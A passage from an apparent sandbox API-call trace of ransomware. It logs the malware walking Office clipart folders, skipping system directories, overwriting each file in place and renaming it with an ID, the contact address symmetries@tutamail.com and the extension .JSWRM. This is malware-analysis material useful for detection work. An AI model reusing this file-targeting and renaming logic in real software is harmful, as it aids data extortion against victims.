lpString2="system volume information") returned -1 [0093.408] lstrcmpiW (lpString1="PE03331_.WMF", lpString2="msocache") returned 1 [0093.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03331_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03331_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03331_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0093.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03331_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03331_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03331_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.409] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1682) returned 1 [0093.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x690) returned 0x22d530 [0093.410] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x690, lpOverlapped=0x0) returned 1 [0093.411] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.411] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x690, lpOverlapped=0x0) returned 1 [0093.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0093.412] CloseHandle (hObject=0x314) returned 1 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0093.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0093.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0093.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.413] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x282c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03339_.WMF", cAlternateFileName="")) returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2=".") returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="..") returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="...") returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="windows") returned -1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="recovery") returned -1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="perflogs") returned -1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="documents and settings") returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="system volume information") returned -1 [0093.413] lstrcmpiW (lpString1="PE03339_.WMF", lpString2="msocache") returned 1 [0093.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03339_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03339_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03339_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0093.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03339_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03339_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03339_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0093.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.414] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10284) returned 1 [0093.414] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2820) returned 0x24d210 [0093.414] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2820, lpOverlapped=0x0) returned 1 [0093.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.416] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2820, lpOverlapped=0x0) returned 1 [0093.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.416] CloseHandle (hObject=0x314) returned 1 [0093.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0093.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0093.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0093.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0093.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.417] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.418] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2108, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03451_.WMF", cAlternateFileName="")) returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2=".") returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="..") returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="...") returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="windows") returned -1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="recovery") returned -1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="perflogs") returned -1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="documents and settings") returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="system volume information") returned -1 [0093.418] lstrcmpiW (lpString1="PE03451_.WMF", lpString2="msocache") returned 1 [0093.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03451_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03451_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03451_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0093.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03451_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03451_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03451_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0093.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.419] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8456) returned 1 [0093.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2100) returned 0x205850 [0093.419] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2100, lpOverlapped=0x0) returned 1 [0093.466] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.466] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2100, lpOverlapped=0x0) returned 1 [0093.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.466] CloseHandle (hObject=0x314) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0093.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0093.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0093.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0093.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0093.468] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f24, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE03453_.WMF", cAlternateFileName="")) returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2=".") returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="..") returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="...") returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="windows") returned -1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="recovery") returned -1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="perflogs") returned -1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="documents and settings") returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="system volume information") returned -1 [0093.468] lstrcmpiW (lpString1="PE03453_.WMF", lpString2="msocache") returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03453_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE03453_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE03453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.469] WideCharToMultiByte (in: CodePage=0xfde9, 